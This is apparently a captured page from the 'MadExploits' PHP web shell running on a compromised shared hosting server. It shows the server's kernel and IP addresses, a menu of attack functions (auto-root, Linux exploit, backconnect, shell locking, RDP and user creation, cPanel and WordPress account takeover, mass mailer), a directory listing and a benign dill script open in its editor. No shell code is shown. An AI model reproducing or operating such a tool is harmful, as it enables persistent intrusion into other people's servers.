Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
cloudlinux /
venv /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
Activate.ps1
8.82
KB
-rw-r--r--
activate
1.65
KB
-rw-r--r--
activate.csh
915
B
-rw-r--r--
activate.fish
2.14
KB
-rw-r--r--
alembic
229
B
-rwxr-xr-x
chardetect
237
B
-rwxr-xr-x
cl_sysctl
4.51
KB
-rwxr-xr-x
clcpapi
3.64
KB
-rwxr-xr-x
coverage
231
B
-rwxr-xr-x
coverage-3.11
231
B
-rwxr-xr-x
coverage3
231
B
-rwxr-xr-x
cpanel-dbmapping
3.83
KB
-rwxr-xr-x
da_suid_caller.py
686
B
-rw-r--r--
detect-requirements
238
B
-rwxr-xr-x
dodgy
224
B
-rwxr-xr-x
epylint
235
B
-rwxr-xr-x
f2py
232
B
-rwxr-xr-x
f2py3
232
B
-rwxr-xr-x
f2py3.11
232
B
-rwxr-xr-x
flake8
230
B
-rwxr-xr-x
futurize
231
B
-rwxr-xr-x
get_gprof
1.84
KB
-rwxr-xr-x
get_objgraph
1.63
KB
-rwxr-xr-x
isort
225
B
-rwxr-xr-x
isort-identify-imports
259
B
-rwxr-xr-x
jsonschema
229
B
-rwxr-xr-x
lvestats_config_reader.py
1.12
KB
-rw-r--r--
mako-render
229
B
-rwxr-xr-x
normalizer
260
B
-rwxr-xr-x
pasteurize
233
B
-rwxr-xr-x
pip
237
B
-rwxr-xr-x
pip3
237
B
-rwxr-xr-x
pip3.11
237
B
-rwxr-xr-x
plesk_suid_caller.py
905
B
-rw-r--r--
prospector
229
B
-rwxr-xr-x
py.test
237
B
-rwxr-xr-x
pycodestyle
228
B
-rwxr-xr-x
pydocstyle
229
B
-rwxr-xr-x
pyflakes
227
B
-rwxr-xr-x
pylint
233
B
-rwxr-xr-x
pylint-config
249
B
-rwxr-xr-x
pyreverse
239
B
-rwxr-xr-x
pysemver
225
B
-rwxr-xr-x
pytest
237
B
-rwxr-xr-x
python
15.59
KB
-rwxr-xr-x
python3
15.59
KB
-rwxr-xr-x
python3.11
15.59
KB
-rwxr-xr-x
raven
235
B
-rwxr-xr-x
symilar
235
B
-rwxr-xr-x
tap
223
B
-rwxr-xr-x
tappy
223
B
-rwxr-xr-x
undill
603
B
-rwxr-xr-x
virtualenv
254
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : get_objgraph
#!/opt/cloudlinux/venv/bin/python3 # # Author: Mike McKerns (mmckerns @caltech and @uqfoundation) # Copyright (c) 2008-2016 California Institute of Technology. # Copyright (c) 2016-2023 The Uncertainty Quantification Foundation. # License: 3-clause BSD. The full license text is available at: # - https://github.com/uqfoundation/dill/blob/master/LICENSE """ display the reference paths for objects in ``dill.types`` or a .pkl file Notes: the generated image is useful in showing the pointer references in objects that are or can be pickled. Any object in ``dill.objects`` listed in ``dill.load_types(picklable=True, unpicklable=True)`` works. Examples:: $ get_objgraph ArrayType Image generated as ArrayType.png """ import dill as pickle #pickle.debug.trace(True) #import pickle # get all objects for testing from dill import load_types load_types(pickleable=True,unpickleable=True) from dill import objects if __name__ == "__main__": import sys if len(sys.argv) != 2: print ("Please provide exactly one file or type name (e.g. 'IntType')") msg = "\n" for objtype in list(objects.keys())[:40]: msg += objtype + ', ' print (msg + "...") else: objtype = str(sys.argv[-1]) try: obj = objects[objtype] except KeyError: obj = pickle.load(open(objtype,'rb')) import os objtype = os.path.splitext(objtype)[0] try: import objgraph objgraph.show_refs(obj, filename=objtype+'.png') except ImportError: print ("Please install 'objgraph' to view object graphs") # EOF
Close